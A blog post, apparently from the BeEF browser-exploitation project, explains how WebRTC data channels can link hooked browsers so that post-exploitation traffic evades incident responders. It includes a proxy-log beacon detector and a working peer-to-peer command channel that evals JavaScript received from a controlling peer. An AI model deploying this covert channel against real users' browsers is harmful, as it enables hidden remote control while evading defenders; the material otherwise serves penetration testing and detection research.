Tuesday, January 6, 2015

Hooked-Browser Meshed-Networks with WebRTC (Kiwicon 2014) - Part 1

Hi All, @xntrik here from sunny Australia. I hope you’ve all had a good New Year's and are ready to kick browser hacking into high gear for 2015. I had a thought that inspired me, and I wanted to share it here.

What if, to avoid tracking our post-exploitation communication back to our BeEF server, we were able to hook a bunch of browsers within an organisation, and make them talk to each other, instead of talking to our BeEF server? Perhaps we could keep one as the data channel (controlling peer)?

The answer is WebRTC. I recently had an amazing opportunity to present this at Kiwicon 2014, and I was keen to get the code into BeEF. This blog post provides a brief summary of WebRTC and how it works. Since there's quite a bit of ground to cover, this will be the first of a two part series.


Retaining post-exploitation communication with hooked-browsers is one of the more interesting issues with BeEF.

By default, BeEF uses XMLHttpRequest objects to poll your BeEF server every 5 seconds. The logic lives in the updater.js file of the core BeEF JavaScript client: it uses setTimeout() to call beef.updater.get_commands(), which requests the hook.js file from the BeEF server.

BeEF can also use the WebSocket protocol, which replaces polling with a bi-directional stream between the server and the browsers. Other, more esoteric options are being investigated as well, such as DNS channels.

One issue with all of these methods is that every communication channel leads back to the BeEF server. There are ways to hide or obfuscate the server's presence, but most of them still lead back to it eventually. For example, you could:

  • run multiple BeEF servers,
  • run servers with multiple interfaces,
  • run multiple proxies pointing to your BeEF server,
  • poll less frequently,
  • use JavaScript obfuscation (which may help, but not much at the network layer), or
  • use TLS encapsulation (same issue: the comms still go to the BeEF server).

If your targets are spread across many organisations, having things track back to your BeEF server may not matter much. If you're targeting a single organisation, though, this information is very useful to incident responders: once they detect one browser talking to your BeEF server, they'll very quickly spot the others. (This is still a big IF. As of today, no AV engines detect the stock, un-obfuscated hook.js, which is not altogether surprising.)
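The responders' side of that argument, as an added example that is not part of the original post or of BeEF: a small beacon check over a few constructed proxy log lines. The log format ("<epoch_seconds> <client_ip> <method> <url>"), the addresses, the 5-second cadence and the function names (parseLine, findBeacons, relatedHooks) are all assumptions made for the illustration. It shows why the default XHR polling is cheap to pivot on: the near-constant interval separates hooked browsers from ordinary browsing, and every other client beaconing to the same host as one known hook is another hook.

```javascript
// Added example, not BeEF project code. Constructed proxy log: two clients poll
// hook.js on an assumed BeEF server every 5 s while a third browses an intranet.
const SAMPLE_LOG = [
  '1420502400 10.0.1.15 GET http://192.0.2.10:3000/hook.js',
  '1420502401 10.0.1.40 GET http://intranet.example/news',
  '1420502402 10.0.1.22 GET http://192.0.2.10:3000/hook.js',
  '1420502405 10.0.1.15 GET http://192.0.2.10:3000/hook.js',
  '1420502407 10.0.1.22 GET http://192.0.2.10:3000/hook.js',
  '1420502410 10.0.1.15 GET http://192.0.2.10:3000/hook.js',
  '1420502412 10.0.1.22 GET http://192.0.2.10:3000/hook.js',
  '1420502413 10.0.1.40 GET http://intranet.example/news/42',
  '1420502415 10.0.1.15 GET http://192.0.2.10:3000/hook.js',
  '1420502417 10.0.1.22 GET http://192.0.2.10:3000/hook.js',
  '1420502420 10.0.1.15 GET http://192.0.2.10:3000/hook.js',
  '1420502422 10.0.1.22 GET http://192.0.2.10:3000/hook.js',
  '1420502449 10.0.1.40 GET http://intranet.example/news',
];

// Parse one line of the assumed format into its fields; only host matters here.
function parseLine(line) {
  const [ts, ip, method, url] = line.trim().split(/\s+/);
  return { ts: Number(ts), ip, method, host: new URL(url).host };
}

// Group requests by (client, destination host) and flag pairs whose request
// intervals are both frequent and nearly constant: polling, not browsing.
function findBeacons(lines, { minHits = 4, maxJitter = 1 } = {}) {
  const byPair = new Map();
  for (const r of lines.map(parseLine)) {
    const key = r.ip + ' ' + r.host;
    if (!byPair.has(key)) byPair.set(key, []);
    byPair.get(key).push(r.ts);
  }
  const beacons = [];
  for (const [key, stamps] of byPair) {
    if (stamps.length < minHits) continue;
    stamps.sort((a, b) => a - b);
    const gaps = stamps.slice(1).map((t, i) => t - stamps[i]);
    const jitter = Math.max(...gaps) - Math.min(...gaps);
    if (jitter > maxJitter) continue;  // irregular gaps look like a human
    const [ip, host] = key.split(' ');
    const interval = gaps.reduce((a, b) => a + b, 0) / gaps.length;
    beacons.push({ ip, host, hits: stamps.length, interval });
  }
  return beacons;
}

// The pivot from the post: given one browser already known to talk to the
// BeEF server, list every other client beaconing to the same host.
function relatedHooks(lines, knownIp) {
  const beacons = findBeacons(lines);
  const servers = new Set(beacons.filter((b) => b.ip === knownIp).map((b) => b.host));
  return beacons
    .filter((b) => servers.has(b.host) && b.ip !== knownIp)
    .map((b) => b.ip)
    .sort();
}

console.log(findBeacons(SAMPLE_LOG));
console.log('other hooks talking to the same server as 10.0.1.15:', relatedHooks(SAMPLE_LOG, '10.0.1.15'));
```

A jitter threshold of one second is deliberately tight for a constructed log; on real proxy data you would widen it and add a minimum duration, but the shape of the check stays the same, which is exactly why the post goes looking for a channel that never reaches the server.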

[Image: VirusTotal report for stock hook.js]
Thanks to those clever folks over at Google, Mozilla and Opera, we have an HTML5 technology to help us: WebRTC. WebRTC was initially intended to provide peer-to-peer communications for use cases such as p2p video streaming: because of the bandwidth involved, it's often better to stream video directly between peers than to bounce it through servers. Apart from media streaming, WebRTC also provides a data channel. The data channel works a little like a WebSocket, in that it's event-driven and bi-directional, and it is exactly the feature we can use in BeEF to peer hooked browsers together. One caveat: the peers still need a signalling channel to exchange session descriptions and ICE candidates before the direct connection is established, so some traffic to a server remains during setup.

The WebRTC extension in BeEF is currently disabled by default, but it's easy enough to enable. The extension lets hooked browsers communicate with one another, using a single controlling peer as the data channel. It has been tested on Firefox 34.0.5 and Chrome 39.0.2171.95 (and Chrome on Android too!). In part two of this series, we'll discuss some of the underlying JavaScript and how to use the extension.
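The data channel described above, with one controlling peer and one hooked peer, as an added example; this is not code from BeEF's WebRTC extension, whose JavaScript is the subject of part two. Two RTCPeerConnections in a single page exchange their SDP offer/answer and ICE candidates through an in-memory SignalingRelay that stands in for whatever server-side relay the peers would use, then open an RTCDataChannel over which commands travel peer-to-peer. The names (SignalingRelay, connectPeers, frameCommand, parseCommand, the 'beef' channel label), the JSON command framing and the empty iceServers list are all assumptions for the illustration.

```javascript
// Added example, not code from BeEF's WebRTC extension. Runs in a browser page;
// the signaling relay and the command framing below are plain JavaScript.

// The only server-side piece WebRTC needs: something that forwards signaling
// messages between two peers that cannot yet reach each other. Deliveries are
// logged so you can confirm that only offer/answer/ice ever cross it.
class SignalingRelay {
  constructor() { this.peers = new Map(); this.log = []; }
  register(id, onMessage) { this.peers.set(id, onMessage); }
  send(from, to, msg) {
    const handler = this.peers.get(to);
    if (!handler) throw new Error('unknown peer ' + to);
    this.log.push({ from, to, type: msg.type });
    queueMicrotask(() => handler(from, msg)); // async, in order, like a network hop
  }
}

// Assumed wire format for commands on the data channel: one JSON object each.
function frameCommand(id, js) {
  return JSON.stringify({ id, js });
}
function parseCommand(text) {
  const msg = JSON.parse(text);
  if (!Number.isInteger(msg.id) || typeof msg.js !== 'string') throw new Error('bad command frame');
  return msg;
}

// Browser-only: bring up a controlling peer and a hooked peer and return the
// controller's open data channel. iceServers is empty on the assumption that
// both sit on the same host or LAN; add a STUN/TURN server to cross NAT.
async function connectPeers(relay, controllerId = 'controller', hookedId = 'hooked') {
  const cfg = { iceServers: [] };
  const controller = new RTCPeerConnection(cfg);
  const hooked = new RTCPeerConnection(cfg);

  // The relay delivers in order and each RTCPeerConnection queues its
  // operations, so candidates that follow an offer/answer are applied after it.
  relay.register(controllerId, async (from, msg) => {
    if (msg.type === 'answer') await controller.setRemoteDescription(msg);
    else if (msg.type === 'ice') await controller.addIceCandidate(msg.candidate);
  });
  relay.register(hookedId, async (from, msg) => {
    if (msg.type === 'offer') {
      await hooked.setRemoteDescription(msg);
      const answer = await hooked.createAnswer();
      await hooked.setLocalDescription(answer);
      relay.send(hookedId, from, { type: 'answer', sdp: answer.sdp });
    } else if (msg.type === 'ice') {
      await hooked.addIceCandidate(msg.candidate);
    }
  });
  controller.onicecandidate = (e) => {
    if (e.candidate) relay.send(controllerId, hookedId, { type: 'ice', candidate: e.candidate.toJSON() });
  };
  hooked.onicecandidate = (e) => {
    if (e.candidate) relay.send(hookedId, controllerId, { type: 'ice', candidate: e.candidate.toJSON() });
  };

  // The hooked side: run whatever arrives and send the result straight back
  // over the same peer link, so the reply never touches the relay either.
  hooked.ondatachannel = (e) => {
    e.channel.onmessage = (m) => {
      const cmd = parseCommand(m.data);
      let result;
      try { result = String((0, eval)(cmd.js)); } catch (err) { result = 'error: ' + err.message; }
      e.channel.send(JSON.stringify({ id: cmd.id, result }));
    };
  };

  // Creating the channel before the offer puts its SCTP section into the SDP.
  const channel = controller.createDataChannel('beef');
  const offer = await controller.createOffer();
  await controller.setLocalDescription(offer);
  relay.send(controllerId, hookedId, { type: 'offer', sdp: offer.sdp });
  await new Promise((resolve) => { channel.onopen = resolve; });
  return { controller, hooked, channel };
}

async function demo() {
  const relay = new SignalingRelay();
  const { channel } = await connectPeers(relay);
  console.log('relayed during setup:', relay.log.map((m) => m.type).join(' '));
  channel.onmessage = (m) => console.log('peer replied:', m.data);
  channel.send(frameCommand(1, 'navigator.userAgent')); // peer-to-peer, never via the relay
}
if (typeof RTCPeerConnection !== 'undefined') demo().catch(console.error);
```

Paste it into a page in a WebRTC-capable browser and the console shows the handful of offer/answer/ice messages that crossed the relay, followed by the user agent string returned over the data channel. With real hooked browsers on different machines the relay becomes a network hop and the empty iceServers list has to become a STUN server at least; the setup traffic is what a responder can still see, which is why the signalling exchange is worth keeping short.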
